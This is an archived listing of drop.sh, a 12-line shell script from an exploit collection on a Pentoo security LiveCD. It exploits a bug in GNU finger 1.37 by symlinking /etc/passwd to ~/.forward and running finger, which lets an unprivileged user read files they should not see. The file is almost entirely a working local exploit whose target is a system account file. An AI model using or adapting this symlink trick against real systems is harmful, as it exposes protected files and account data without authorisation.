home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / finger / drop.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  319b  |  12 lines

  1. #!/bin/sh
  2. #
  3. # There is a bug in GNU  finger version 1.37
  4. # allowing any user on  a system to view any
  5. # file they want by creating  a symlink from
  6. # the file to .plan, .forward, or .project .
  7. # Permissions are not dropped before reading
  8. # those files.
  9.  
  10. ln -s /etc/passwd ~/.forward
  11. finger $USER|grep -v null
  12.